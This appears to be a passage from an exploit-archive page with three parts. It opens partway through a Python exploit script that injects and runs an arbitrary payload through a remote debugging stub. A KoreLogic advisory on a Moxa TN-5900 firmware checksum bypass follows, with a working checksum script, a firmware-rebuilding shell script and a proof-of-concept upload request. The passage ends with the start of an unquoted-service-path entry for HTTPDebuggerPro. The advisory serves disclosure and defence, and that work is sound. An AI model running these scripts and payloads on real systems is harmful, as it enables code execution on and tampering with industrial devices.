Try again later')<br /> exit(1)<br /><br /> if arch == '10':<br /> print('[+] Found x64 arch')<br /> pc = binascii.unhexlify(pc[:pc.index('0*')])<br /> pc += b'\0' * (8 - len(pc))<br /> addr = hex(struct.unpack('<Q', pc)[0])[2:]<br /> addr = '0' * (16 - len(addr)) + addr<br /> elif arch == '08':<br /> print('[+] Found x86 arch')<br /> pc = binascii.unhexlify(pc)<br /> pc += b'\0' * (4 - len(pc))<br /> addr = hex(struct.unpack('<I', pc)[0])[2:]<br /> addr = '0' * (8 - len(addr)) + addr<br /><br /> hex_length = hex(len(payload))[2:]<br /><br /> print('[+] Sending payload')<br /> send(sock, f'M{addr},{hex_length}:{payload}')<br /> send(sock, 'vCont;c')<br /><br /><br />def main():<br /> if len(sys.argv) < 3:<br /> print(help)<br /> exit(1)<br /><br /> ip, port = sys.argv[1].split(':')<br /> file = sys.argv[2]<br /><br /> try:<br /> with open(file, 'rb') as f:<br /> payload = f.read().hex()<br /> except FileNotFoundError:<br /> print(f'[!] ERROR: File {file} not found')<br /> exit(1)<br /><br /> with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:<br /> sock.connect((ip, int(port)))<br /> print('[+] Connected to target. Preparing exploit')<br /> exploit(sock, payload)<br /> print('[*] Pwned!! Check your listener')<br /><br /><br />if __name__ == '__main__':<br /> main()<br /> <br /></code></pre>
<pre><code>KL-001-2022-001: Moxa TN-5900 Firmware Upgrade Checksum Validation Vulnerability<br /><br />Title: Moxa TN-5900 Firmware Upgrade Checksum Validation Vulnerability<br />Advisory ID: KL-001-2022-001<br />Publication Date: 2022.01.28<br />Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2022-001.txt<br /><br /><br />1. Vulnerability Details<br /><br /> Affected Vendor: Moxa<br /> Affected Product: TN-5900<br /> Affected Version: v3.1 and prior<br /> Platform: Moxa Linux<br /> CWE Classification: CWE-354 Improper Validation of Integrity<br /> Check Value<br /> CVE ID: CVE-2021-46559<br /><br /><br />2. Vulnerability Description<br /><br /> Moxa TN-5900 v3.1.0 and prior uses an insecure method to<br /> validate firmware updates. A malicious user with access to the<br /> management interface can upload abritrary code in a crafted<br /> firmware image simply by replacing a CRC value in the image<br /> header.<br /><br /><br />3. Technical Description<br /><br /> Analysis on this vulnerability began when KoreLogic noticed that<br /> the Ssgl2_update_session_now function is immediately called<br /> when the URL /goform/web_fwUpload is given to the management<br /> application. The Ssgl2_update_session_now function will enable<br /> a session after authentication through the user interface.<br /><br /> undefined4 websSecurityHandler(longlong *param_1) {<br /> ...<br /> ...<br /> if (requestPtr[0x20] != 0) {<br /> ...<br /> ...<br /> field_1 = strncmp(in_t0,"/init.asp",9);<br /> if (CONCAT44(extraout_v0_hi_07,field_1) != 0) {<br /> field_2 = strncmp(in_t0,"/goform/web_fwUpload",0x14);<br /> if (CONCAT44(extraout_v0_hi_08,field_2) == 0) {<br /> Ssgl2_update_session_now(local_490);<br /> }<br /> lVar3 = Ssgl2_webmultisession_session_verify(local_490,auStack104);<br /> ...<br /> }<br /> }<br /> ...<br /> ...<br /> }<br /><br /> Reviewing the web_fwUpload function showed the code is used to<br /> update the operating firmware of the affected device. 
Before<br /> the firmware is accepted, it must pass a check. This check is<br /> provided through the Ssys_firmwareCheck function.<br /><br /> void web_fwUpload(longlong *param_1,longlong *param_2) {<br /> ...<br /> if (lVar1 == -1) {<br /> FUN_1200222c0(param_1,"../upgrade.asp","Firmware Upgrade Fail! Restart the device.");<br /> ...<br /> }<br /> else {<br /> printf("%s() buffer upload datalen = %d\n","web_fwUpload",*(param_1 + 0x39));<br /> ...<br /> ...<br /> }<br /> else {<br /> puts("Ssys_firmwareCheck");<br /> local_118 = Ssys_firmwareCheck(lVar1,4,*(param_1 + 0x39));<br /> if (-1 < local_118) {<br /> local_118 = Ssys_writeProgram(lVar1);<br /> }<br /> if (local_118 < 0) {<br /> printf("%s() %d firmware check fail ret = %d\n","web_fwUpload",0x7c0,local_118);<br /> ...<br /> ...<br /> }<br /> ...<br /> }<br /><br /> The Ssys_firmwareCheck function checks that the kernel and<br /> file system have an expected length and that the provided<br /> image passes a checksum algorithm.<br /><br /> undefined8 Ssys_firmwareCheck(ulonglong param_1,longlong param_2,ulonglong param_3,ulonglong param_4) {<br /> ...<br /> if (param_2 == local_44._4_4_) {<br /> ...<br /> if (local_4c._0_4_ == 0x400000) {<br /> if ((uVar4 < 0x1800001) && ((uVar4 & 3) == 0)) {<br /> ...<br /> file_check_sum(param_1 + 0x20,local_4c._4_4_ + 0x400000,&local_50);<br /> uVar3 = 0;<br /> if (local_50 != local_3c._0_4_) {<br /> FUN_0010d230("[Error] %s L%d : Firmware checksum error (0x%x), should be 0x%x<br />\r\n","Ssys_firmwareCheck",0x484,local_50,local_3c._0_4_,extraout_t1_00,extraout_t2_00,extraout_t3_00);<br /> uVar3 = 0xfffffffffffffffc;<br /> }<br /> }<br /> else {<br /> FUN_0010d230("[Error] %s L%d : Rootfs length error (%d), max to %d bytes<br />\r\n","Ssys_firmwareCheck",0x47a,uVar4,0x1800000,extraout_t1,extraout_t2,extraout_t3);<br /> uVar3 = 0xfffffffffffffffd;<br /> }<br /> }<br /> else {<br /> FUN_0010d230("[Error] %s L%d : Kernel length error (%d), should be %d bytes<br 
/>\r\n","common.c","Ssys_firmwareCheck",0x474,local_4c._0_4_,0x400000,extraout_t2,extraout_t3);<br /> uVar3 = 0xfffffffffffffffe;<br /> }<br /> }<br /> else {<br /> FUN_0010d230("[Error] %s L%d : Firmware file logo mismatch (0x0x), should be 0x%x<br />\r\n","Ssys_firmwareCheck",0x46c,local_44._4_4_,param_2,extraout_t1,extraout_t2,extraout_t3);<br /> uVar3 = 0xffffffffffffffff;<br /> }<br /> ...<br /> }<br /> <br /> The checksum is simple and implemented using the following algorithm:<br /> <br /> #!/usr/bin/env python3<br /> import sys<br /> from functools import partial<br /> from binascii import hexlify<br /> <br /> with open(sys.argv[1],"rb") as f:<br /> f.seek(0x20)<br /> checksum = int(0)<br /> for dword in iter(partial(f.read,4),b''):<br /> checksum += int(hexlify(dword),16)<br /> print (hex(checksum)[-8:])<br /><br /> A breakpoint was set on the file_check_sum function using GDB<br /> and the valid ROM provided by Moxa was processed. The result<br /> of the checksum process was retrieved.<br /><br /> Breakpoint 14, 0x000000fff6fac3a4 in _init () from target:/tmp/moxa/usr/lib64/libsyscommon.so<br /> (gdb) x/1x 0xfffbf4ce30<br /> 0xfffbf4ce30: 0x2f43167a<br /><br /> The bytes 0x2f43167a were found in the ROM image itself inside<br /> of a header containing 0x20 bytes.<br /><br /> $ hexdump -C moxa-tn-5900-series-firmware-v3.1.rom<br /> 00000000 00 40 00 00 01 45 b0 00 00 00 00 20 00 00 00 04 |.@...E..... ....|<br /> 00000010 2f 43 16 7a 03 01 00 00 14 04 07 11 00 00 00 00 |/C.z............|<br /><br /> The following script was constructed to disassemble and rebuild<br /> a firmware image using the expected format. The script will<br /> create a file /korelogic on the filesystem. 
The file will be<br /> zero bytes.<br /><br /> #!/bin/sh<br /> IF=$1<br /> OF=$2<br /> dd bs=1 if=$IF of=$IF.header_1 count=$((0x10))<br /> dd bs=1 if=$IF of=$IF.checksum skip=$((0x10)) count=4<br /> dd bs=1 if=$IF of=$IF.header_2 skip=$((0x14)) count=$((0x20-0x14))<br /> dd bs=1 if=$IF of=$IF.kernel skip=$((0x20)) count=$((0x1d9669-0x20))<br /> dd bs=1 if=$IF of=$IF.splitter skip=$((0x1d9669)) count=$((0x400020-0x1d9669))<br /> dd bs=1 if=$IF of=$IF.cramfs skip=$((0x400020))<br /> cramfsswap $IF.cramfs $IF.cramfs.swap<br /> sudo cramfsck -x fs $IF.cramfs.swap<br /> touch fs/korelogic<br /> mkcramfs fs/ $IF.cramfs.modified<br /> cat $IF.header_1 $IF.checksum $IF.header_2 $IF.kernel $IF.splitter $IF.cramfs.modified > $OF<br /> ./checksum.py $OF | xxd -r -p > check_value<br /> dd bs=1 conv=notrunc if=check_value of=$OF seek=$((0x10)) count=4<br /> <br /> Here is the script running.<br /> <br /> $ sudo ./make_moxa_image.sh moxa-tn-5900-series-firmware-v3.1.rom hacked.rom<br /> 16+0 records in<br /> 16+0 records out<br /> 16 bytes copied, 9.967e-05 s, 161 kB/s<br /> 4+0 records in<br /> 4+0 records out<br /> 4 bytes copied, 7.4433e-05 s, 53.7 kB/s<br /> 12+0 records in<br /> 12+0 records out<br /> 12 bytes copied, 0.000118918 s, 101 kB/s<br /> 1939017+0 records in<br /> 1939017+0 records out<br /> 1939017 bytes (1.9 MB, 1.8 MiB) copied, 3.76396 s, 515 kB/s<br /> 2255287+0 records in<br /> 2255287+0 records out<br /> 2255287 bytes (2.3 MB, 2.2 MiB) copied, 4.32499 s, 521 kB/s<br /> 21344256+0 records in<br /> 21344256+0 records out<br /> 21344256 bytes (21 MB, 20 MiB) copied, 40.8949 s, 522 kB/s<br /> Filesystem is big endian, will be converted to little endian.<br /> Filesystem contains 3313 files.<br /> CRC: 0x9b7eefd0<br /> 4+0 records in<br /> 4+0 records out<br /> 4 bytes copied, 7.4433e-05 s, 53.7 kB/s<br /><br /> The hacked.rom image is then processed and the same breakpoint<br /> is hit. The new checksum should be 0x0987aafc. 
The new checksum<br /> is patched into the hacked.rom image already from the above<br /> script.<br /><br /> $ hexdump -C hacked.rom<br /> 00000000 00 40 00 00 01 45 b0 00 00 00 00 20 00 00 00 04 |.@...E..... ....|<br /> 00000010 09 87 aa fc 03 01 00 00 14 04 07 11 00 00 00 00 |/C.z............|<br /> <br /> GDB output confirms that the checksum is the same result:<br /> <br /> Breakpoint 2, 0x000000fff72853a4 in _init () from target:/tmp/moxa/usr/lib64/libsyscommon.so<br /> (gdb) x/1x 0xfffbad34d0<br /> 0xfffbad34d0: 0x0987aafc<br /> <br /> When processing the hacked.rom image, we receive a new error.<br /> <br /> Firmware check failed, error occurs when write kernel to flash. Restart the device.<br /><br /> Comparing the indicated error against the pseudo-c indicates we<br /> have passed the firmware validation checks. This was confirmed<br /> using GDB as well.<br /><br /> void web_fwUpload(longlong *param_1,longlong *param_2) {<br /> ...<br /> if (lVar1 == -1) {<br /> ...<br /> }<br /> else {<br /> ...<br /> else {<br /> puts("Ssys_firmwareCheck");<br /> local_118 = Ssys_firmwareCheck(lVar1,4,*(param_1 + 0x39));<br /> if (-1 < local_118) {<br /> local_118 = Ssys_writeProgram(lVar1);<br /> }<br /> ...<br /> }<br /> <br /> The error indicating a write exception is expected as we were<br /> not operating on a Moxa device but were instead emulating the<br /> Moxa firmware on a MIPS development board.<br /><br /><br />4. Mitigation and Remediation Recommendation<br /><br /> The vendor has released a patch which remediates the described<br /> vulnerability. Release notes are available at:<br /><br /> https://www.moxa.com/en/support/product-support/security-advisory/tn-5900-secure-routers-vulnerabilities<br /><br /><br />5. Credit<br /><br /> This vulnerability was discovered by Matt Bergin (@thatguylevel)<br /> and Josh Hardin of KoreLogic, Inc.<br /><br /><br />6. 
Disclosure Timeline<br /><br /> 2021.02.05 - KoreLogic submits vulnerability details to Moxa.<br /> 2021.02.08 - Moxa acknowledges receipt and the intention to<br /> investigate.<br /> 2021.03.02 - Moxa notifies KoreLogic that a patch for this<br /> vulnerability is expected to be available in June 2021.<br /> 2021.04.16 - 45 business days have elapsed since KoreLogic reported<br /> this vulnerability to the vendor.<br /> 2021.06.07 - KoreLogic requests update on the status of the<br /> proposed TN-5900 patch.<br /> 2021.06.15 - Moxa informs KoreLogic that the patch is expected to be released in mid-July 2021.<br /> 2021.06.23 - 90 business days have elapsed since KoreLogic reported<br /> this vulnerability to the vendor.<br /> 2021.07.25 - Moxa informs KoreLogic that the patch is expected to be released in mid-August 2021.<br /> 2021.09.22 - 150 business days have elapsed since KoreLogic reported<br /> this vulnerability to the vendor.<br /> 2021.12.21 - 210 business days have elapsed since KoreLogic reported<br /> this vulnerability to the vendor.<br /> 2021.12.27 - Moxa notifies KoreLogic that the patch is complete and ready for release.<br /> 2021.12.28 - Moxa public acknowledgement.<br /> 2022.01.25 - KoreLogic requests CVE from Mitre.<br /> 2022.01.28 - KoreLogic public disclosure.<br /><br /><br />7. 
Proof of Concept<br /><br /> POST /goform/web_fwUpload HTTP/1.1<br /> Host: 192.168.10.10<br /> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br /> Accept-Language: en-US,en;q=0.5<br /> Accept-Encoding: gzip, deflate<br /> Content-Type: multipart/form-data; boundary=---------------------------11395841764774651092787307532<br /> Content-Length: <HTTP REQUEST SIZE><br /> Connection: close<br /> Upgrade-Insecure-Requests: 1<br /> <br /> -----------------------------11395841764774651092787307532<br /> Content-Disposition: form-data; name="binary"; filename="hacked.rom"<br /> Content-Type: text/plain<br /> <br /> <HACKED.ROM FIRMWARE IMAGE><br /> -----------------------------11395841764774651092787307532<br /> Content-Disposition: form-data; name="submit"<br /> <br /> submit<br /> -----------------------------11395841764774651092787307532--<br /> <br /> HTTP/1.1 200 OK<br /> Server: GoAhead-Webs<br /> Pragma: no-cache<br /> Cache-control: no-cache<br /> Content-Type: text/html<br /> Transfer-Encoding: chunked<br /> <br /> <!DOCTYPE html><br /> <html><br /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><br /> <head><br /> <title></title><br /> </head><br /> <body bgcolor="#E8FFF7" text="#000000" topmargin="10" leftmargin="12" ><br /> <font size="2" face="Arial, Helvetica, sans-serif, Marlett"><br /> <p>Firmware check failed, error occurs when write kernel to flash. Restart the device.</p><br /> </font></body><br /> </html><br /><br /><br /><br />The contents of this advisory are copyright(c) 2022<br />KoreLogic, Inc. and are licensed under a Creative Commons<br />Attribution Share-Alike 4.0 (United States) License:<br />http://creativecommons.org/licenses/by-sa/4.0/<br /><br />KoreLogic, Inc. is a founder-owned and operated company with a<br />proven track record of providing security services to entities<br />ranging from Fortune 500 to small and mid-sized companies. 
We<br />are a highly skilled team of senior security consultants doing<br />by-hand security assessments for the most important networks in<br />the U.S. and around the world. We are also developers of various<br />tools and resources aimed at helping the security community.<br />https://www.korelogic.com/about-korelogic.html<br /><br />Our public vulnerability disclosure policy is available at:<br />https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt<br /><br /></code></pre>
<pre><code># Exploit Title: HTTPDebuggerPro 9.11 - Unquoted Service Path<br /># Exploit Author: Aryan Chehreghani<br /># Date: 23/11/2021<br /># Vendor Homepage: https://www.httpdebugger.com<br /># Software Link: https://www.httpdebugger.com/download.html<br /># Version: 9.11<br /># Tested on: Windows 10 x64<br /><br />SERVICE_NAME: HTTPDebuggerPro<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : "C:\Program Files (x86)\HTTPDebuggerPro\HTTPDebuggerSvc.exe"<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : HTTP Debugger Pro<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br /></code></pre>